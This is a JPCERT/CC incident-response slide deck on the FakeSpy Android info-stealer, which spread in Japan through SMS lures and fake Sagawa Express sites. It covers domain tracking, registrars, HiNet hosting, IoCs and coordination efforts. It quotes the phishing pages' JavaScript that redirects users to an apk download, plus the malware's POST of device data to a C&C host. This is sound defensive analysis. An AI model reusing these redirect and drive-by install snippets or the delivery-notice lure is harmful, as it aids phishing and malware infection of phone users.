The Recent FakeSpy's Activity in Japan

The recent FakeSpy's
activity in Japan
JPCERT Coordination Center
Incident Response Group
Shoko Nakai

Copyright ©2019 JPCERT/CC All rights reserved.
Agenda
FakeSpy observed in Japan
JPCERT/CC’s analysis results
—Domain/IP address
—Phishing contents, apk
—Overview of FakeSpy
JPCERT/CC’s action and future challenges
1

FakeSpy - introduction -
Information stealing malware targeting Android OS
Spreads via SMS
Trend Micro introduced on the blog in June 2018
—FakeSpy Android Information-Stealing Malware
Targets Japanese and Korean-Speaking Users
https://blog.trendmicro.com/trendlabs-security-intelligence/fakespy-
android-information-stealing-malware-targets-japanese-and-korean-
speaking-users/
JPCERT/CC has been receiving reports since 2018
2

Cases targeting Android OS
Few previous cases targeting Android OS
—JPCERT/CC has been dealing cases since 2012
3
Method • 3rd party
Application
Store
• Drive-by
Download
• DNS
(spoofing)
(hijacking)
• SMS
No information • DNS
(spoofing)
(hijacking)
• SMS
• etc
2012 2013 2014 20162015 2017 20192018
apk
2012/10
Info.jigensha.hellopage.apk
(Phonebook)
2012/12
mailActivity.apk
2014/06
sschecker.apk
(trojan.banker)
2014/08
sijil.apk
(androidos_RUSMS)
2015/02
1.apk
123.apk
2016/12
zp.apk 2018/01 - onwards
sagawa.apk
facebook.apk
koyamato.apk
ocn.apk
(FakeSpy)

FakeSpy - beginning -
In early 2018, Many reports were informed to
JPCERT/CC suddenly:
—Phishing contents purporting to be a specific entity
and apk-hosting website
—Users are guided to the website via SMS
4

FakeSpy - reports -
Number of reports to JPCERT/CC related to FakeSpy
sites (2018/01 – 2019/01)
5
7
1 0 1 0 2
11
19
3
15
49
36
2
0
10
20
30
40
50
60
Jan-18 Feb-18 Mar-18 Apr-18 May-18 Jun-18 Jul-18 Aug-18 Sep-18 Oct-18 Nov-18 Dec-18 Jan-19

FakeSpy - Victims -
Following companies are targeted:
Sagawa Express: sagawa.apk
Yamato Transport: koyamato.apk
OCN (Network provider) :ocn.apk
6

Sagawa Express Case (Ongoing)
Fake websites purporting to be Sagawa Express and
sagawa.apk are still active
Characteristics
—One of the major Japanese transportation companies
—When a package is delivered during recipient’s
absence, the driver will post “Attempted Delivery
Notice”
—Redelivery can be arranged via phone or website
※SMS is NOT used for “Attempted Delivery Notice” or
redelivery arrangement
7

Fake “Attempted Delivery Notice” SMS
8
Council of Anti-phishing Japan
https://www.antiphishing.jp/news/alert/sagawa_20180810.html
(Roughly translated)
We attempted to
deliver a package to
you, but we take it
back due to your
absence. Please
check below:

phishing and apk
Click anywhere in the fake site and either a phishing
contents or apk install page will appear:
10
phishing contents apk install page
Trendmicro security blog
https://blog.trendmicro.co.jp/archives/16787
Asking for
Apple ID
credentials
Instruction on
apk install

JPCERT/CC’s analysis results
11

Collect information on fake sites
Many domains starting with “sagawa-” were used for fake websites. We
created a list of possible domains and attempted to resolve Domain
Names.
Automatically collect fake Sagawa sites
— Create a list of domain names which contains “sagawa”
— Resolve Domain Names
Search by WHOIS
Send http requests to the IP address
— If “http response 200” is returned
Obtain phishing contents
Obtain apk file (sort by hash value)
Store all the records
12

Tracking sagawa Domain
13
sagawa-aa.com
sagawa-ab.com
…
1) Generate Domain
List
(475228+ domains)
resolve
sagawa-xxx.com : 1.xxx.xx.xx
sagawa-xxu.com : 1.xxx.xx.xy
…
2) Generate IP List
3) Whois
4)
✓ HTTP Request
✓ HTTP Response
5) Fake-Sagawa-db
export
cron

Results (on Jan 31, 2019)
Domains that were resolvable: 940 domains
Associated IP address: 171 IP addresses
14

Resolved domains: sagawa-[a-z]{#}.com ?
15
sagawa-aae.com sagawa-abo.com sagawa-aia.com sagawa-aod.com sagawa-aw.com sagawa-yaya.com
sagawa-aai.com sagawa-abu.com sagawa-aiai.com sagawa-app.com sagawa-awe.com sagawa-yi.com
sagawa-aaka.com sagawa-achi.com sagawa-ai.com sagawa-ara.com sagawa-awi.com sagawa-ynu.com
sagawa-aak.com sagawa-ada.com sagawa-aka.com sagawa-ar.com sagawa-awo.com sagawa-yo.com
sagawa-aake.com sagawa-ad.com sagawa-ak.com sagawa-are.com sagawa-aya.com sagawa-yryr.com
sagawa-aaki.com sagawa-ade.com sagawa-ake.com sagawa-ari.com sagawa-ay.com sagawa-ytqq.com
sagawa-aako.com sagawa-adi.com sagawa-aki.com sagawa-aro.com sagawa-ayo.com sagawa-ytqw.com
sagawa-aaku.com sagawa-ado.com sagawa-ako.com sagawa-aru.com sagawa-ayu.com sagawa-zaa.com
sagawa-aao.com sagawa-adu.com sagawa-aku.com sagawa-asa.com sagawa-aza.com sagawa-za.com
sagawa-aasa.com sagawa-ae.com sagawa-ama.com sagawa-as.com sagawa-az.com sagawa-zae.com
sagawa-aas.com sagawa-afu.com sagawa-am.com sagawa-ase.com sagawa-aze.com sagawa-zai.com
sagawa-aase.com sagawa-aga.com sagawa-ame.com sagawa-ashi.com sagawa-azi.com sagawa-zaka.com
sagawa-aashi.com sagawa-ag.com sagawa-ami.com sagawa-aso.com sagawa-azo.com sagawa-zak.com
sagawa-aaso.com sagawa-age.com sagawa-amo.com sagawa-asu.com sagawa-azu.com sagawa-zao.com
sagawa-aasu.com sagawa-agi.com sagawa-amu.com sagawa-aswe.com sagawa-baa.com sagawa-zau.com
sagawa-aata.com sagawa-ago.com sagawa-ana.com sagawa-ata.com
(snip)
sagawa-zc.com
sagawa-aat.com sagawa-agu.com sagawa-an.com sagawa-at.com sagawa-ze.com
sagawa-aau.com sagawa-aha.com sagawa-ane.com sagawa-ate.com sagawa-xixi.com sagawa-zo.com
sagawa-aba.com sagawa-ah.com sagawa-ani.com sagawa-ato.com sagawa-xx.com sagawa-zu.com
sagawa-ab.com sagawa-ahe.com sagawa-ano.com sagawa-atsu.com sagawa-yaa.com sagawa-zv.com
sagawa-abe.com sagawa-ahi.com sagawa-anu.com sagawa-au.com sagawa-ya.com sagawa-zx.com
sagawa-abi.com sagawa-aho.com sagawa-ao.com sagawa-awa.com sagawa-yau.com sagawa-zz.com

Registered Domains [2018 ~]
16
When the domain was purchased and from who
0
5
10
15
20
25
30
35
2018-06-23
2018-06-26
2018-06-29
2018-07-01
2018-07-03
2018-07-05
2018-07-07
2018-07-09
2018-07-11
2018-07-13
2018-07-15
2018-07-17
2018-07-19
2018-07-21
2018-07-27
2018-07-29
2018-08-02
2018-08-04
2018-08-06
2018-08-08
2018-08-10
2018-08-13
2018-08-16
2018-09-03
2018-09-07
2018-10-08
2018-10-21
2018-11-01
2018-11-05
2018-11-12
2018-11-18
2018-11-22
2018-11-26
2018-11-30
2018-12-02
2018-12-08
2018-12-14
2018-12-20
2018-12-26
2018-12-30
2019-01-04
2019-01-06
2019-01-11
2019-01-17
2019-01-24
Bizcn.com,Inc. Chengdu west dimension digital technology Co., LTD
GoDaddy.com, LLC PDR Ltd. d/b/a PublicDomainRegistry.com
XINNET TECHNOLOGY CORPORATION
Chengdu West
Dimension Digital
Xinnet Technology

Domain price (as of Dec 2018)
Chengdu West Dimension Digital Technology Co.
17
.com domain price (per year)
35CNY: ($5.2 USD)

Domain price (as of Dec 2018)
18
Xinnet Technology Corporation
.com domain price (per year)
25CNY: ($3.7 USD)
With promotion?

Domains used for the campaign
Mostly provided by Chinese registrars
Attackers seems to be shifting towards registrars who offer
cheaper prices
However, no free domains seem to be used.
—(Hypothetically) Purchased domains may survive for a
longer time than free domains
19

Resolved IP addresses
Almost all active malware/phishing sites were hosted on HiNet
20
HINET
81%
timeout
78%
200
14%
CHOOPALLC-AP GO-DADDY-COM-LLC HINET-NET
IDNIC-BIZNETGIO-ID LVLT-ORG-4-8
HiNet (94%)
(n=171)
23
21
15
13
107
7
6
6
5
5
4
4
4
4
3
3
3
2
2 2 2 2 2 2
1 1
1
1
1
1 11 1 1
IP address break down by HiNet CIDR
61.230.0.0/16
61.228.0.0/16
61.231.0.0/16
114.43.0.0/16
1.162.0.0/16
1.169.0.0/16
111.240.0.0/16
1.160.0.0/16
118.160.0.0/16
1.171.0.0/16
1.172.0.0/16
36.226.0.0/16
1.173.0.0/16
118.165.0.0/16
118.163.0.0/16
1.175.0.0/16
36.225.0.0/16
118.169.0.0/16
61.227.0.0/16
114.36.0.0/16
1.161.0.0/16
36.236.0.0/16
60.251.0.0/16
220.136.0.0/16
(n=171)
Ratio of network service
providers of IP addresses
associated with fake sagawa
domains

Sample Response
Checked what was running on the IP addresses
associated with fake domains
—4 hosts were picked up as a sample [Dec 11,2018 3PM GMT +9]
‘Device Admin Panel’ was accessible
—Possibly compromised and
remotely controlled
21
HTTP Response
Server: Apache-Coyote/1.1
All fake site include
“Apache-Coyote/1.1”
in there header

IP address
Network range of a Taiwanese ISP “HiNet”
Multiple IP addresses are used in the attack infrastructure
Phishing contents and apk file may be operating on the
compromised hosts
—A common web server software was found
22

Source code (redirecting to a phishing site)
Redirect script to a phishing site
—Users are redirected when clicking anywhere on the
site
⚫ pp.html
23
function kk(){
//alert("速達便をダウンロードされますので、ダウンロード後にインストールしてください");
window.location.href = "./pp.html";
}
(snip)
</head>
<body onclick="kk();">
(snip)
pp.html →

Source code (redirecting to an apk install page) 1
Code to check User-Agent and install apk
24
var pc_style = ""
var browser = {
versions: function () {
var u = navigator.userAgent, app = navigator.appVersion;
return {
trident: u.indexOf('Trident') > -1,
presto: u.indexOf('Presto') > -1,
webKit: u.indexOf('AppleWebKit') > -1,
gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1,
mobile: !!u.match(/AppleWebKit.*Mobile.*/) || !!u.match(/AppleWebKit/) && u.indexOf('QIHU') && u.indexOf('QIHU') > -1 &&
u.indexOf('Chrome') < 0,
ios: !!u.match(/¥(i[^;]+;( U;)? CPU.+Mac OS X/),
android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1,
iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1,
iPad: u.indexOf('iPad') > -1,
webApp: u.indexOf('Safari') == -1,
ua: u
};
}(),
language: (navigator.browserLanguage || navigator.language).toLowerCase()
}
if (browser.versions.mobile && !browser.versions.android) {
this.location = "http[:]//sagawa-[MASKED][.]com/";
}

Copyright ©2019 JPCERT/CC All rights reserved.25
Source code (redirecting to an apk install page) 2
Install apk when anything on the page is clicked (without
checking User-Agent)
Various patterns of source code to installing apk to the
device were confirmed
function kk(){
//alert("速達便をダウンロードされますので、ダウンロード後にインストールしてください");
window.location.href = "./sagawa.apk";
}
(snip)
</head>
<body onclick="kk();">
(snip)

apk file
Obtained apk file
—Duration: 2018/12/5 – 2019/01/31
—Files obtained: 80
Hash Values
26

apk file analysis
It contains code that attempts to POST some information
from the infected device
27
POST //servlet/xx HTTP/1.1
ser-Agent: Fiddler
Content-Type: application/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; sdk Build/KK)
Host: 125.227.174.32
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 129
{"json":"{¥"npki¥":¥"1¥",¥"provider¥":¥"¥",¥"bank¥":¥"¥",¥"machine¥":¥"sdk¥",¥"sversion¥":¥"4.4.2¥",¥"mobile¥":¥"15555215554¥"}"}

Destination hosts
The hosts the apk was communicating to:
—125.227.174.32
—125.227.0.22
Whois information
28
inetnum: 125.224.0.0 - 125.231.255.255
netname: HINET-NET
descr: Data Communication Business Group,
descr: Chunghwa Telecom Co.,Ltd.
- (snip)

apk functions
Analyzed sample
Contents sent from the infected device
— Serial number
— Applications installed
— Device model (e.g. Android SDK built for x86)
— OS version
— SQLite data (id, type, protocol, address, body)
Command sent from the C&C server in return
— Cause the infected device to send out SMS to contacts saved in the infected phone
— In some cases, a new C&C server address is specified in the command to switch the
communication route
29
sagawa.apk [Analysis period: 2018/12/26]
MD5 3657739fedf62d852242fe7169be3f57
SHA1 45848866d2f8d36baf0c03c8e8ed79624c756c6c
SHA256 71c59c898b3d7d191bd285ebe6788460b9e276aca433d4d10e0eade85430f42a

FakeSpy’s Whole Picture
30

Attack infrastructure
Component
✓ SMS
✓ Fake domain
✓ Servers hosting phishing contents and apk file
✓ Server controlling apk files (C&C server)
Stakeholders
—Mobile network operator
—Internet service provider
—Domain registrar etc.
31

Relations of FakeSpy(sagawa.apk) stakeholders
32
Sagawa-ab.com
Sagawa-ac.com
Sagawa-ad.com
Sagawa-ae.com
Sagawa-af.com
Sagawa-ag.com
Sagawa-ah.com
Sagawa-ai.com
Sagawa-aj.com
SMS
Address
SMS
Address
SMS
Address
ｃSender number, SMS contents
http://sagawa-[a-z]{#}.com
sagawa.apk
Sagawa-
[a-z]{2}
.com
Sagawa-
[a-z]{3}
.com
Sagawa-gab.com
Sagawa-gac.com
Sagawa-gad.com
Sagawa-gae.com
Sagawa-gaf.com
Sagawa-gag.com
Sagawa-gah.com
Sagawa-gai.com
Sagawa-gaj.com
DNS server
(Mostly hosted in China)
Sawaga-a.com 111.222.333.444
Sawaga-b.com 222.333.444.555
Sawaga-c.com 333.444.555.666
✓ Chengdu West
✓ Xinnet
HiNet (Taiwan)
SMS
OS : Android
C&C
Compromised
hosts
Mobile network provider ISP Registrars

JPCERT/CC’s action and future
challenges
33

JPCERT/CC’s action
Coordination with the entities administrating the
hosts/networks used as part of the attack infrastructure
1. Domain registrar: Requested registrars to suspend
fake domains
2. Internet service provider: Requested admins of web
servers hosting phishing contents and apk to suspend
them
3. Law enforcement agency, CSIRT: Provided
information on C&C server to the Taiwanese Law
enforcement agency and National CSIRT
34

JPCERT/CC has coordinated with the colored parties
35
Sagawa-ab.com
Sagawa-ac.com
Sagawa-ad.com
Sagawa-ae.com
Sagawa-af.com
Sagawa-ag.com
Sagawa-ah.com
Sagawa-ai.com
Sagawa-aj.com
SMS
Address
SMS
Address
SMS
Address
ｃ
sagawa.apk
Sagawa-
[a-z]{2}
.com
Sagawa-
[a-z]{3}
.com
Sagawa-gab.com
Sagawa-gac.com
Sagawa-gad.com
Sagawa-gae.com
Sagawa-gaf.com
Sagawa-gag.com
Sagawa-gah.com
Sagawa-gai.com
Sagawa-gaj.com
DNS server
Sawaga-a.com 111.222.333.444
Sawaga-b.com 222.333.444.555
Sawaga-c.com 333.444.555.666
✓ Chengdu West
✓ Xinnet
HiNet (Taiwan)
SMS
OS : Android
C&C
Mobile network provider ISP Registrars
Compromised
hosts
Sender number, SMS contents

Other things we have done
Besides the coordination with domain registrars, network
operators etc.
—Provided the fake site information to the browser
operators so that they can alert users upon the fake
sites being accessed
—Shared the IoCs information with the security venders
so that they can reflect the information in their
product
The blank parts are still being left..
—What can we do about it?
36

Mobile network providers
37
SMS
Address
SMS
Address
SMS
Address
ｃ
sagawa.apk
HiNet (Taiwan)
SMS
OS : Android
C&C
Compromised
hosts
Mobile network provider ISP
Sender number, SMS contents

Challenges－Mobile network providers－
Current situation
Previously fake apk was distributed through 3rd party application
stores, emails or websites. However, in recent cases, route
hijacking (due to network compromised via misconfigured
routers) and SMS is the most common means.
Challenge
Network devices can be either replaced or re-configured, but
what measures are there about SMS spams? We would like to
hear the measures that mobile network providers can take
against malicious SMS spam.
38

Domain registrar (Registrant)
39
Sagawa-ab.com
Sagawa-ac.com
Sagawa-ad.com
Sagawa-ae.com
Sagawa-af.com
Sagawa-ag.com
Sagawa-ah.com
Sagawa-ai.com
Sagawa-aj.com
Sagawa-
[a-z]{2}
.com
Sagawa-
[a-z]{3}
.com
Sagawa-gab.com
Sagawa-gac.com
Sagawa-gad.com
Sagawa-gae.com
Sagawa-gaf.com
Sagawa-gag.com
Sagawa-gah.com
Sagawa-gai.com
Sagawa-gaj.com
DNS server
Sawaga-a.com 111.222.333.444
Sawaga-b.com 222.333.444.555
Sawaga-c.com 333.444.555.666
✓ Chengdu West
✓ Xinnet
HiNet (Taiwan)
C&C
Compromised
host
ISP Registrar

Challenges – Domain registrar (Registrant)
Current situation
Attackers tend to use domain registrars who offers at a cheaper
price
Challenge
Do domain registrars have any measure to screen registrants or
any criteria to identify malicious domain registration? (e.g. use of
domains that can look like an existing service)
We hope to discuss with domain registrars to prevent fake
domains from being registered by attackers.
40

The Recent FakeSpy's Activity in Japan

Related slideshows

More Related Content

The Recent FakeSpy's Activity in Japan